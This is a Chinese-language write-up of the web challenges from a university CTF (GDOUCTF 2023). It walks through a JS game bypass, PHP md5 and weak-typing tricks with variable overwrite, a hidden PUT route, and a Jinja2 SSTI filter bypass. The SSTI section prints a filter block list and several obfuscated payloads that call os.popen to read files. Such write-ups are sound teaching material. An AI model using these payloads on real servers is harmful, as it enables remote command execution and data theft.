GDOUCTF2023 WriteUp

2023-05-16 11:09:33 浏览数 (2)

  • 前言

GDOUCTF 为广东海洋大学Hor1zon战队面向本校的第一次新生赛性质的校赛,比赛旨在选拔出有能力且志同道合的师傅加入战队,同时对海大校内学生普及信息安全知识,增强信息安全意识,提高网络空间安全创新能力与实践技能。

web方向AK,团队排名59,总的来说Web方向出的较简单,这里记录一手个人的题解记录,,NSSCTF平台可以复现

Web

hate eat snake

根据规则要玩 60 秒,但过几秒蛇的速度就激情起来了,根本把控不住

js代码经过了混淆,不能直接获得flag

代码语言:javascript复制
if (this['getScore']() > -0x1e9 * -0xf   0x5 * 0x6d   -0x2e * 0xaa)
                return alert(_0x324fcb(0x2d9, 0x2c3, 0x2db, 0x2f3)   'k3r_h0pe_t'   _0xe4a674(0x5a1, 0x595, 0x59e, 0x57c)   'irlfriend}'),
                ![];

那么这里要求60秒,查看分数的计算逻辑

代码语言:javascript复制
getScore: function() {

    ///////////////////////
    var score = Math.round((this.timeCounter   new Date().getTime() - this.startTime) / 1000);
    /////////////////////////

    return score;
}

很容易只是单纯判断开始时间和当前时间的差值,那么这里就可以直接让程序开始运行后暂停60秒

这里使用浏览器的开发者工具中的调试功能完成

然后就能得到flag啦

看师傅们的wp还有很多办法,有长按空格键暂停的,还有下载 js 代码本地修改判断分数语句运行得flag的,还有修改Snake的原型链的方法得flag的,控制台运行Snake.prototype.getScore = () => 114514

受不了一点
代码语言:javascript复制
<?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];
    if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){
        if(isset($_COOKIE['cookie'])){
           if ($_COOKIE['cookie']=='j0k3r'){
               if(isset($_GET['aaa']) && isset($_GET['bbb'])){
                  $aaa=$_GET['aaa'];
                  $bbb=$_GET['bbb'];
                 if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){
                   $give = 'cancanwordflag';
                   $get ='hacker!';
                   if(!isset($_GET['flag']) && !isset($_POST['flag'])){
                         die($give);
                    }
                   if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
                       die($get);
                    }
                    foreach ($_POST as $key => $value) {
                        $$key = $value;
                   }
                    foreach ($_GET as $key => $value) {
                         $$key = $$value;
                    }
                   echo $flag;
            }else{
                  echo "洗洗睡吧";
                 }
    }else{
        echo "行不行啊细狗";
        }
  }
}
else {
  echo '菜菜';
}
}else{
  echo "就这?";
}
}else{
  echo "别来沾边";
}
?> 别来沾边

首先看第一圈和第二圈 if 判断,因为都是围绕gdouctf两个参数

代码语言:javascript复制
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];
    if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){

这里md5弱比较,直接一手数组绕过,POST传入gdou[]=1&ctf[]=2

然后看第三四圈 if 判断

代码语言:javascript复制
if(isset($_COOKIE['cookie'])){
       if ($_COOKIE['cookie']=='j0k3r'){

设置Cookie头,Cookie: cookie=j0k3r

接着进入第五六圈 if 判断

代码语言:javascript复制
if(isset($_GET['aaa']) && isset($_GET['bbb'])){
      $aaa=$_GET['aaa'];
      $bbb=$_GET['bbb'];
     if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){

这里用PHP弱类型特性进行绕过,GET传参?aaa=114514&bbb=114514a

终于到了最后一坨

代码语言:javascript复制
$give = 'cancanwordflag';
$get ='hacker!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
     die($give);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
   die($get);
}
foreach ($_POST as $key => $value) {
    $$key = $value;
}
foreach ($_GET as $key => $value) {
     $$key = $$value;
}
echo $flag;

这里if要求POST或者GET传入参数flag,特别注意POST和GET进入后,后面foreach的逻辑不同,相差一个$

使用GET传入则对传入的键值对进行遍历和变量覆盖,既然不能直接让flag=flag自己传给自己,那就找个中间人,给他之后再拿回来

所以GET传入hacker=flag&flag=hacker

最终payload

代码语言:javascript复制
GET: ?aaa=114514&bbb=114514a&hacker=flag&flag=hacker
Header: Cookie: cookie=j0k3r
POST: gdou[]=1&ctf[]=2
EZ WEB

首先有一个点击按钮,点点看,提示Where's the flag? i swear it was around here somewhere,盲猜哪有源码泄露什么的

先查看源码,发现注释

代码语言:javascript复制
<!-- /src -->

进到这个路由

代码语言:javascript复制
import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
  return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
  return flask.send_file('app.py')

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
  return open('flag').read()

这就很简单了,直接PUT请求方法往/super-secret-route-nobody-will-guess路由发包就可以了

这里可以用burpsuite随便抓个当前页面的包,然后改包发送即可

ez_ze

使用wappalyzer插件快速知道网站用的python的flask框架

盲猜SSTI,输入{{7*7}}测测是不是,回显Invalid input detected甚至这里被过滤了,可以用 Jinja2 的 {%...%} 语句装载一个循环控制语句来绕过,输入{%7*7%},这里报错了获取到了部分源码。其实是忘了不能这么写,

应该{%print(......)%} 的形式来代替 {{}}

代码语言:javascript复制
File "/app/app.py", line 21, in get_flag
    if re.search(pattern, name):
        return render_template('index.html', error='Invalid input detected.')Open an interactive python shell in this frame
    else:
        # 使用用户输入进行模板渲染
        template = "Hello, $ {} $!".format(name)
        return render_template_string(template)

确信是SSTI了,那么开始测测过滤了神魔吧

这里直接给最后getshell拿到的后端代码了

代码语言:javascript复制
# -*- coding: utf-8 -*- 
from flask import Flask, request, render_template, render_template_string 
import re 
app = Flask(__name__) 
@app.route('/') 
def index(): 
    return render_template('index.html') 
@app.route('/get_flag', methods=['POST']) 
def get_flag(): 
    name = request.form['name'] 
    # 进行过滤规则的检查 
    pattern = r"({{|}}|popen|os|subprocess|application|getitem|flag.txt|.|_|[|]|"|class|subclasses|mro|\)" 
    if re.search(pattern, name): 
        return render_template('index.html', error='Invalid input detected.') 
    else: # 使用用户输入进行模板渲染 
        template = "Hello, $ {} $!".format(name) 
        return render_template_string(template) 
if __name__ == '__main__': 
    app.run(host='0.0.0.0',port=80,debug=True)

经过测试也可以发现过滤是相当狠的

所以这里利用jinja过滤器进行bypass(原理见这篇文章,这里直接给出payload)

代码语言:javascript复制
{%set nine=dict(aaaaaaaaa=a)|join|count%}
{%set eighteen=nine nine%}
{%set pop=dict(pop=a)|join%}
{%set xhx=(lipsum|string|list)|attr(pop)(eighteen)%}
{%set kg=(lipsum|string|list)|attr(pop)(nine)%}
{%set globals=(xhx,xhx,dict(globals=a)|join,xhx,xhx)|join%}
{%set get=(xhx,xhx,'metiteg'|reverse,xhx,xhx)|join%}
{%set s='so'|reverse%}
{%set cla=(xhx,xhx,'ssalc'|reverse,xhx,xhx)|join%}
{%set bas=(xhx,xhx,'esab'|reverse,xhx,xhx)|join%}
{%set bas=(xhx,xhx,'sessalcbus'|reverse,xhx,xhx)|join%}
{%set po='nepop'|reverse%}
{%set flag=(dict(cat=a)|join,kg,dict(flag=a)|join)|join%}
{%set read=dict(read=a)|join%}
{%print(lipsum|attr(globals)|attr(get)(s)|attr(po)('cat /f*')|attr(read)())%}

看到大佬们有github的fenjing工具一把梭的 @rbeopad

代码语言:javascript复制
{%print(((lipsum|attr((‘%c’*11)%(95,95,103,108,111,98,97,108,115,95,95))|attr((‘%c’*11)%(95,95,103,101,116,105,116,101,109,95,95))((‘%c’*12)%(95,95,98,117,105,108,116,105,110,115,95,95))|attr((‘%c’*11)%(95,95,103,101,116,105,116,101,109,95,95))((‘%c’*4)%(101,118,97,108))))((‘%c’*42)%(95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,112,111,112,101,110,40,39,99,97,116,32,47,102,108,97,103,39,41,46,114,101,97,100,40,41)))%}

还有巧妙利用没被过滤的|attr()拼接字符串的 @Cnily03

代码语言:javascript复制
{%set u='%c'�*2%}{%print(''|attr(u 'cla''ss' u)|attr(u 'ba''se' u)|attr(u 'su''bcla''sses' u)()|attr(213)|attr(u 'i''n''i''t' u)|attr(u 'glo''bal''s' u)|attr('ge''t')(u 'bui''lti''ns' u)|attr('ge''t')(u 'imp''ort' u)('o''s')|attr('po''pen')('ca''t /f''lag')|attr('re''ad')())%}

本文采用CC-BY-SA-3.0协议,转载请注明出处 Author: ph0ebus

0 人点赞